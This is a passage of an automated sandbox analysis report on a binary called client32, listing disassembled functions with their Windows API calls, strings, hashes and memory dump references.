                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MetricsSystem$AtomGlobal
                                                                                                                                    • String ID: NSMAnnotate
                                                                                                                                    • API String ID: 1775358667-1587977882
                                                                                                                                    • Opcode ID: 0ab50aaa82936b499c722e1eccc7d7de1002793e4e15bfd85b105029e2cc8b0f
                                                                                                                                    • Instruction ID: c7367c546af50a4de639236848e5e5652b6277b92aa1928d07c4543d278ba0f2
                                                                                                                                    • Opcode Fuzzy Hash: 0ab50aaa82936b499c722e1eccc7d7de1002793e4e15bfd85b105029e2cc8b0f
                                                                                                                                    • Instruction Fuzzy Hash: 2021AFB0901B549FD321DF6A8984696FBE8FFA4754F00491FD2AA87A20D7B5A440CF44
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11003390 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadMenuA.USER32 ref: 1100339D
                                                                                                                                    • GetSubMenu.USER32 ref: 110033C3
                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 110033F2
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                    • Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                                                                    • Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
                                                                                                                                    • Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                                                                    • Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11003480 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadMenuA.USER32 ref: 1100348D
                                                                                                                                    • GetSubMenu.USER32 ref: 110034B3
                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 110034E2
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                    • API String ID: 468487828-934300333
                                                                                                                                    • Opcode ID: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                                                                    • Instruction ID: f340f484bb22d03bd5e0d621a808cbfa0eacb2cd0322e49d7d14e933c66e57f7
                                                                                                                                    • Opcode Fuzzy Hash: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                                                                                    • Instruction Fuzzy Hash: 63F0EC3EF9063573D25321772C0AF8FB5844B8569DF550032FD26BEA40EE14B40146B9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110099B0 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 252COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: *extra_bytes$..\ctl32\AUDIO.CPP$Audio$Send EV_CONFIGSET from %s@%d$nbytes <= sizeof (extra_bytes)
                                                                                                                                    • API String ID: 0-3655815180
                                                                                                                                    • Opcode ID: 1c8d697225cb49c02d3d80bd86d82e51fcdcced23fd4a2cfc8c78112465bb8a1
                                                                                                                                    • Instruction ID: adf310d86d08ca25db8df7bbab2a8961bf55d7c961d25e6615f2bb86ec9d3f5a
                                                                                                                                    • Opcode Fuzzy Hash: 1c8d697225cb49c02d3d80bd86d82e51fcdcced23fd4a2cfc8c78112465bb8a1
                                                                                                                                    • Instruction Fuzzy Hash: 17A14874E012299FDB61CF24C990BEAF7F4AF49344F1484E9D98DA7241E770AA84CF91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11016410 Relevance: 9.1, APIs: 6, Instructions: 80windowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutA.USER32(?,0000007F,00000000,00000000,00000002,000001F4,?), ref: 11016442
                                                                                                                                    • GetClassLongA.USER32 ref: 1101645E
                                                                                                                                    • CopyIcon.USER32 ref: 11016469
                                                                                                                                    • SendMessageTimeoutA.USER32(?,0000007F,00000001,00000000,00000002,000001F4,00000000), ref: 1101648F
                                                                                                                                    • GetClassLongA.USER32 ref: 1101649F
                                                                                                                                    • CopyImage.USER32 ref: 110164B9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassCopyLongMessageSendTimeout$IconImage
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1346719093-0
                                                                                                                                    • Opcode ID: 6c95b261b42d9ef95c0244228f3fccf77e083fac3dc6cee70a1aaad8816d8880
                                                                                                                                    • Instruction ID: 52e36b3cc5b4867ec12e27719debc037fef8f2d782e630a2d27beabddd169e4c
                                                                                                                                    • Opcode Fuzzy Hash: 6c95b261b42d9ef95c0244228f3fccf77e083fac3dc6cee70a1aaad8816d8880
                                                                                                                                    • Instruction Fuzzy Hash: 7F110AB1BD12297BFB048A65CD46FBE739CDB85765F004269F524EA0C4EBF599004760
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11027580 Relevance: 9.1, APIs: 6, Instructions: 70threadwindowsleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageA.USER32 ref: 110275D2
                                                                                                                                    • Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
                                                                                                                                    • PostThreadMessageA.USER32 ref: 110275F7
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
                                                                                                                                    • CloseHandle.KERNEL32(00000000,00002710,?,1102DB60,00000001), ref: 11027614
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2375713580-0
                                                                                                                                    • Opcode ID: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                                                                    • Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
                                                                                                                                    • Opcode Fuzzy Hash: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                                                                                    • Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11002590 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ObjectSelect$LineMove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 359220273-0
                                                                                                                                    • Opcode ID: 912494e776754d9e43a2a32872c63d300be8357348bb960b20f75cb825616cfa
                                                                                                                                    • Instruction ID: 21f229d1c7d8c8dc4b4b16be7dffbf2429469ae1aeee6a23e1c2fe7cad82a0fa
                                                                                                                                    • Opcode Fuzzy Hash: 912494e776754d9e43a2a32872c63d300be8357348bb960b20f75cb825616cfa
                                                                                                                                    • Instruction Fuzzy Hash: CA012876201128BFD704DB95DD84DABF7ACFF89210B108256FD2883640D770AD018BA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11095990 Relevance: 9.0, APIs: 6, Instructions: 38COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4116985748-0
                                                                                                                                    • Opcode ID: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
                                                                                                                                    • Instruction ID: b65ab4a361e5326c91c4d36ade1d631f08c7cf5d252a1eb012e320adc1ee70d1
                                                                                                                                    • Opcode Fuzzy Hash: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
                                                                                                                                    • Instruction Fuzzy Hash: 01F030B1B4131A6BE7009FAADC41B55BB98EB48664F008037A71C87680D6B5A8108FE4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11146370 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleModule
                                                                                                                                    • String ID: %s: $CLIENT32
                                                                                                                                    • API String ID: 4139908857-407627211
                                                                                                                                    • Opcode ID: bbfd822ea36ec1217a5ea76a287d4667e02058545888def00001442b4b624510
                                                                                                                                    • Instruction ID: af445439b6752a8968c272d87336ee6d3db593790a582df571d11f25a3ee04be
                                                                                                                                    • Opcode Fuzzy Hash: bbfd822ea36ec1217a5ea76a287d4667e02058545888def00001442b4b624510
                                                                                                                                    • Instruction Fuzzy Hash: C241493550016ADBCB11CF24DC58AEEFBB9EF4630DF1486A4E82987680DB71964DCF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1116C50B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DecodePointer.KERNEL32(00000007,1116A45F,1116A445,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C51C
                                                                                                                                    • TlsFree.KERNEL32(00000026,1116A45F,1116A445,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1116C536
                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,1116A45F,1116A445,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 1117448C
                                                                                                                                    • DeleteCriticalSection.KERNEL32(00000026,?,?,1116A45F,1116A445,111DCFE0,00000008,1116A530,?,?,?,111DD000,0000000C,1116A5EB,?), ref: 111744B6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalDeleteSection$DecodeFreePointer
                                                                                                                                    • String ID: `ehv
                                                                                                                                    • API String ID: 1592661152-1077679218
                                                                                                                                    • Opcode ID: ef81d3ede941d447b7a02941a6457c0e39bc810be1e5cfe8a6c18e3c6b69a16f
                                                                                                                                    • Instruction ID: 5d5e1d30d11e5fc4bb6de4968e4daf3e1bf255a86e74f4722019767d2db84794
                                                                                                                                    • Opcode Fuzzy Hash: ef81d3ede941d447b7a02941a6457c0e39bc810be1e5cfe8a6c18e3c6b69a16f
                                                                                                                                    • Instruction Fuzzy Hash: 25012D32C4172187D621AAAC8EC8569F7E9AF50B3D3514319E8B7E36E4C7349841D761
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11093410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registrywindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
